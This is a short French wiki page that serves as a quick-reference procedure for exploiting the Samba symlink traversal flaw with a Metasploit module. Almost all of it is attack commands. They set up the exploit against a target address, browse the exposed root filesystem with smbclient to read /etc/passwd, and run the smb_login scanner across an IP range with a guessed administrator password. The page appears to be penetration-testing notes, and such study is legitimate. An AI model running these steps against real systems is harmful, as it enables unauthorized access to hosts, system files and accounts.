Samba anonyme

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche
Fiche express
Domaine Exploitation Samba / SMB
Module admin/smb/samba_symlink_traversal
Effet Traversée par lien symbolique + accès anonyme
Voir aussi Ubuntu metasploit · Scans metasploit

Exploitation de la vulnérabilité de traversée par lien symbolique de Samba (samba_symlink_traversal) : le partage tmp est détourné pour accéder à l'ensemble du système de fichiers en accès anonyme.

Accès anonyme, lister les partages :

smbclient -L hostname

Procédure

msfconsole
use auxiliary/admin/smb/samba_symlink_traversal
set RHOST 192.168.0.18
set SMBSHARE tmp
exploit
exit

Puis parcourir le système de fichiers exposé :

smbclient //192.168.0.18/tmp
# dans le client smb :
cd rootfs
cd etc
more passwd

Valider les connexions SMB (Server Message Block)

use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.0.1-100
set SMBuser Administrateur
set SMBpass secret
run

Voir aussi